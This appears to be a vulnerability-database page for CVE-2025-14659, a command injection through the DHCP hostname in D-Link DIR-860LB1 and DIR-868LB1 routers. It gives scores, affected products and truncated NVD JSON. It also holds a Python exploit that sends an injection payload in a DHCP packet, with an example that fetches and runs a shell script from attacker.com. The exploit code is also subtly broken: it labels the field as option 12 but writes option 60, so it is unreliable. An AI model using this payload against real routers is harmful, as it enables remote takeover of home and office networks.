Security Vulnerability Report
中文
CVE-2025-14659 CVSS 8.8 HIGH

CVE-2025-14659

Published: 2025-12-14 12:16:02
Last Modified: 2026-03-08 01:22:02
Source: [email protected]

Description

A vulnerability was detected in D-Link DIR-860LB1 and DIR-868LB1 203b01/203b03. Affected is an unknown function of the component DHCP Daemon. The manipulation of the argument Hostname results in command injection. It is possible to launch the attack remotely. The exploit is now public and may be used.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-868l_b1_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-868l_b1:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:dlink:dir-860l_b1_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-860l_b1:-:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DIR-860LB1 < v203b03
D-Link DIR-868LB1 < v203b01

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import struct # CVE-2025-14659 PoC - DHCP Hostname Command Injection # Target: D-Link DIR-860LB1/DIR-868LB1 def create_dhcp_packet(hostname): # DHCP packet structure packet = b'\x01' # Message type: BOOTREQUEST packet += b'\x01' # Hardware type: Ethernet packet += b'\x06' # Hardware address length packet += b'\x00' # Hops packet += b'\x39\x05\x03\x00' # Transaction ID packet += b'\x00\x00' # Seconds elapsed packet += b'\x00\x00' # Flags packet += b'\x00\x00\x00\x00' # Ciaddr (Client IP) packet += b'\x00\x00\x00\x00' # Yiaddr (Your IP) packet += b'\x00\x00\x00\x00' # Siaddr (Server IP) packet += b'\x00\x00\x00\x00' # Giaddr (Relay IP) packet += b'\x00' * 16 # Client hardware address packet += b'\x00' * 64 # Server host name packet += b'\x00' * 128 # Boot file name packet += b'\x63\x82\x53\x63' # Magic cookie # Option 12: Host Name (with command injection payload) packet += b'\x3c' # Option 60: Vendor class identifier packet += bytes([len(hostname)]) packet += hostname.encode() # End option packet += b'\xff' return packet def exploit(target_ip, malicious_hostname): # Inject command via Hostname option payload = f';{malicious_hostname};#' packet = create_dhcp_packet(payload) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) sock.sendto(packet, (target_ip, 67)) sock.close() print(f'Exploit sent to {target_ip}') # Example usage: Execute reverse shell # exploit('192.168.0.1', 'wget http://attacker.com/shell.sh && sh shell.sh')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14659", "sourceIdentifier": "[email protected]", "published": "2025-12-14T12:16:02.343", "lastModified": "2026-03-08T01:22:01.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was detected in D-Link DIR-860LB1 and DIR-868LB1 203b01/203b03. Affected is an unknown function of the component DHCP Daemon. The manipulation of the argument Hostname results in command injection. It is possible to launch the attack remotely. The exploit is now public and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-868l_b1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "203b01", "matchCriteriaId": "B085C315-2915-45E4-9602-350211612F10"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-868l_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "0DBAAA87-BE50-4587-A1A9-D6E246A4CDBA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-860l_b1_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "203b03", "matchCriteriaId": "95ABC77A-C5D9-475F-B205-BBA09C82F1CF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-860l_b1:-:*:*:*:*:*:*:*", "matchCriteriaId": "A347FCD4-4A9E-4EE0-BE45-A916B2504F7B"}]}]}], "references": [{"url": "https://tzh00203.notion.site/D-Link-DIR-860LB1-v203b03-Command-Injection-in-DHCPd-2c6b5c52018a807eab1ae73dbd95eee3?source=copy_link", "source": "[email protected]", "tags": ["Exploit", "Mitigatio ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.